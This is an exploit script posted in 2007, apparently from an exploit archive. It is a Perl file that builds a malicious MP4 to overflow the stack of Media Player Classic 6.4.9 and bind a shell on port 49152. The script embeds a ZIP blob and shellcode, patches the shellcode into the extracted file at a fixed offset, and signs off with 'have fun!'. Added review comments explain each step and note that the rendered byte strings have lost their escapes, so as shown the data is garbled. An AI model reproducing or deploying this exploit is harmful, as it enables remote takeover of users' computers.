Posted on 09 December 2007
#!/bin/perl
#
# Media Player Classic 6.4.9 MP4 Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Shell on port 49152
#
# usage:
# - download this codec in order to manage MP4 content:
#   http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#
# - open the MP4 file with mplayerc.exe
#
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
#
# What the script does, step by step (see the statements at the bottom):
#   1. writes the embedded $zip_data blob to ./tempzip.zip
#   2. opens that archive with Archive::Zip and extracts the member
#      'SYS_49152_MP4_for_MPC.mp4' into the current directory
#   3. reopens the extracted MP4 read/write and overwrites it from byte
#      offset 619 with $shellcode
#
# NOTE(review): no `use strict; use warnings;` — $zip_data is an undeclared
# package global and `code` is a bareword (global) filehandle reused for both
# files. NOTE(review): the string literals as rendered on this page contain
# no escape sequences, so as written they are plain ASCII text; the offsets
# and the comments above assume binary content.

use Archive::Zip qw( :ERROR_CODES :CONSTANTS );

# Embedded ZIP archive. Written verbatim to tempzip.zip below; the archive
# member 'SYS_49152_MP4_for_MPC.mp4' is extracted from it.
$zip_data = # code 724981
"x50x4Bx03x04x14x00x00x00x08x00xB3xB1x30x36xF3".
"x13xD9x53x73x02x00x00x57x04x00x00x19x00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx4Dx50x43x2Ex6Dx70x34x63x60x60xBFx9C".
"x9Bx9Fx5FxC6xC0xC0x90x93x5Bx96x91x02xA4x19x0E".
"xBCxF1x2Bx3BxF0x26x2Cx99x81x81xF9x05x88xCFxC0".
"x08x46x08x80xC2xC1xE4x3Bx30xE0x05x40xD5xECxF1".
"xA5x29x25x89x40x3Ax3Cx37x15x44x83x81x62x46x4A".
"x4Ex11x4Cx51x6Ex4Ax66x51x62x41x41x0Ex92x3Ex76".
"xADxCCx9CxE2x12x20x43x62x65x5Ex62x2Ex90x16x48".
"x49x04x6Bx86x59x2FxB1xB2xBCxA8x04xABxB8x63x50".
"x08x56xF1xC4x9Cx24x4Cx71x36xF3x95xC9xB9x40x73".
"x98x6Fx21x8Bx4Fx40x02xACx4Cx8CxBExBAx8Cx8CxBE".
"x0ExBEx0Dx37x80x04x90x62x85x50x8Cx10xCAx01x42".
"x75x41xA8x06x08x55x0AxA1x58x20x14x37x84xFAxE4".
"xFBx9Ax0CxD0x9Dx16xEExE0xCCxF1xB3xA4xE3xF5x84".
"x41x03x5ExBFx16xCDx99xE0x3AxD1x97x95x05x12x36".
"x01xBEx87x83x23x83x4Dx2Cx0Dx4Dx8Dx14x82x42x7D".
"x5CxA3x14x8Dx4Fx36xBFxDCx70xF3xDDxCDx12x95x2F".
"xD1x8DxC5xC2x2Bx5CxBFxEEx68x7ExFDxE7xD1x97x10".
"x7DxB9xAFx0Ex7BxB8xDCxC3x55xEBxAExF4x24xD6xFD".
"x9Dx72xAEx73xEFx05x17x29xE3xE7xB1x75xCFx3Bx5C".
"xE4x3Ex2Ax17xD6xEDx74x2Bx31x55x64x39x68x7Ax66".
"x7Dx8BxFDxD6x95xEDx72x3Ex93x05x2Fx4ExB8xBBxA0".
"xEEx79x8Fx8BxDCx3Dx65xCFx7DxC6xDFx23xBFx04xAF".
"xCExACx33x3Cx92xF8xF2x66x76x89xDEx1Dx65xB6xA3".
"xC6x2Fx3CxEBx4Ex6Cx79x51xF7x63x81xF4x5CxB3x67".
"xDEx92x2FxC2x27x4Fx7Ex7Dx4ExF7x58xD7x01xA3xB6".
"xAExEFx82x5Cx19x07xFAx24x5Cx26x8Bx72xE5x7Dx3F".
"x23x70x4Fx73xC5xDFx5Dx7FxF5xBFxBBx57xE8xEAx6C".
"x8Cx7DxB1xC8xBDx4Ex6CxD9xEBxDFx62xDBx5ExBFx16".
"xE3xCAx38xA7x6BxBAxE3x9Cx58x4DxA4xADx6ExE0xA2".
"x1Bx4Dx40x39xFDxA7x2FxFFxEEx52xBDxC0xF3xE2x76".
"xE0xFFx5DxCAxAFx41x6Cx5Fx9ExE2x8Fx40xF6x8Bx3F".
"x82x0BxDCx2BxAExCDx8DxBFxD8xDCxF3x3Ex7Cx32x90".
"xADx3CxFFxCEx39xDDx69x57x15x17xCCx7FxF1x31xC7".
"xD2xD0x5Fx7FxA3xA1x57x89xA9x37xD3xEExEDx53xC3".
"xD8x6Fx6AxABxDAx9Fx15x66x7Ex37xF7x54xD8xB7xC7".
"xEEx77x19xB9xF2x3Ex0Bx2Dx7FxF9x53x64xFExCEx9F".
"x22x0Bx5Ex86x4Fx9Dx2Bx5AxE8x60xFDx3Ax7CxF2x7C".
"xF7xF0x22xAEx0Cx65x21x4ExEBx1Cx45xAExBCx5Fx40".
"xFBxDCxBBx45x6FxFCxDExA5xECx5Ex01x0CxC4x52x70".
"x52x4Ex4FxCDxC3x92xC4x15x4Ax8AxB2x41xE2x12x50".
"x71x74xA0x90x92x59x9Cx8Dx47x5ExAAx24xB7x20x1F".
"x48x0Bx41xE5x45xE1x32x92xC9x05x99xA0xDCx29x88".
"x2ExC3x91x0Bx14x01x00x50x4Bx01x02x14x00x14x00".
"x00x00x08x00xB3xB1x30x36xF3x13xD9x53x73x02x00".
"x00x57x04x00x00x19x00x00x00x00x00x00x00x00x00".
"x20x00x00x00x00x00x00x00x53x59x53x5Fx34x39x31".
"x35x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx4Dx50x43x2E".
"x6Dx70x34x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x47x00x00x00xAAx02x00x00x00x00";

# Payload string. It is written over the extracted MP4 starting at byte
# offset 619 (see the seek below); nothing else in this script inspects it.
my $shellcode = # code 724981
"x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";

# Step 1: dump the embedded archive to disk in the current directory.
# NOTE(review): two-arg open with the mode folded into the string and a
# bareword handle; the path is a constant here, so there is no injection
# risk, but `open my $fh, '>', 'tempzip.zip' or die ...` is the idiom.
# The `close` on a write handle is unchecked, so a buffered write failure
# would go unnoticed.
open(code, ">tempzip.zip") || die "Can't Write temporary File ";
binmode (code);
print code $zip_data;
close (code);
print " Temporary file ready, patching.. ";

# Step 2: read the archive back and extract the MP4 member.
# NOTE(review): the return values of read() and extractMember() are ignored
# (the :ERROR_CODES constants imported above are never compared against), so
# a corrupt archive or a failed extraction is not detected before step 3.
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );

# Step 3: reopen the extracted file read/write ("+<") and overwrite it from a
# fixed byte offset with the payload. seek(..., 619, 0) positions the handle
# at absolute offset 619 (whence 0 = from start of file); its return value
# and the final close are unchecked. The same bareword handle `code` is
# reused here.
open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File ";
binmode (code);
seek code,619,0;
print code $shellcode;
close (code);
print "Shellcode added, have fun! ";